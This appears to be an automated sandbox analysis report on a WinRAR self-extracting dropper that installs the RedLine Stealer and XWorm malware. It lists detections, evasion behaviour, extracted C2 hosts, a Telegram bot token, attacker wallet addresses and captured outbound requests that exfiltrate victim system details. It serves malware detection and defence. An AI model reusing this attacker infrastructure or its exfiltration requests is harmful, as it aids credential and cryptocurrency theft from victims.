Windows Analysis Report
Ekpb7jn7mf.exe

Overview

General Information

Sample name: Ekpb7jn7mf.exe
renamed because original name is a hash value
Original sample name: 4CE2C0836C46C61B588972B56A23D5E2.exe
Analysis ID: 1474423
MD5: 4ce2c0836c46c61b588972b56a23d5e2
SHA1: 939a9f983870df1913acce63ca408bba9789588f
SHA256: 05df07e5e365386ae0917e177328bc12a2405a1c4317266127abb6903aac59b3
Tags: exeRedLineStealer
Infos:

Detection

RedLine, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Avira: detection malicious, Label: TR/Spy.Gen
Found malware configuration
Source: 2.0.wjoqZlIS.exe.900000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["pst-child.gl.at.ply.gg:9336"], "Bot Id": "winsc"}
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack Malware Configuration Extractor: Xworm {"C2 url": ["45.88.186.18"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703"}
Source: YsrQekGS.exe.6564.4.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe ReversingLabs: Detection: 95%
Multi AV Scanner detection for submitted file
Source: Ekpb7jn7mf.exe ReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Ekpb7jn7mf.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: 45.88.186.18
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: 7000
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: <123456789>
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: <Xwormmm>
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: XWorm V5.6
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: USB.exe
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: bc1qwufsd77xxsjenyytmdlh9m6vv2m04md25fntkd
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: 0x8b3AcA40Aaa31E1C71F0478b556b555EBC8FDf55
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: TRcX5LoWZKep5z7QCqHHpdZEwWXHN9GBbv
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: 6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack String decryptor: 6678411703
Uses 32bit PE files
Source: Ekpb7jn7mf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: Binary string: calc.pdbGCTL source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
Source: Binary string: calc.pdb source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Ekpb7jn7mf.exe
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00409396 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00409396
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040DD0E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0040DD0E

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49746 -> 45.88.186.18:7000
Source: Traffic Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 45.88.186.18:7000 -> 192.168.2.4:49746
Source: Traffic Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49746 -> 45.88.186.18:7000
Source: Traffic Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 45.88.186.18:7000 -> 192.168.2.4:49746
Source: Traffic Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49746 -> 45.88.186.18:7000
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 45.88.186.18
Source: Malware configuration extractor URLs: pst-child.gl.at.ply.gg:9336
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49738
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 147.185.221.20:9336
Source: global traffic TCP traffic: 192.168.2.4:49746 -> 45.88.186.18:7000
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: pst-child.gl.at.ply.gg:9336Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: pst-child.gl.at.ply.gg:9336Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: pst-child.gl.at.ply.gg:9336Content-Length: 856137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: pst-child.gl.at.ply.gg:9336Content-Length: 856129Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 147.185.221.20 147.185.221.20
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.186.18
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: pst-child.gl.at.ply.gg
Source: global traffic DNS traffic detected: DNS query: api.ip.sb
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: pst-child.gl.at.ply.gg:9336Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: powershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pst-child.gl.at.ply.gg
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pst-child.gl.at.ply.gg:9336
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pst-child.gl.at.ply.gg:9336/
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 0000000D.00000002.1800097184.00000205807EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mic
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/0
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb
Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.dr String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.dr String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe.0.dr String found in binary or memory: https://api.telegram.org/bot
Source: YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=66784
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
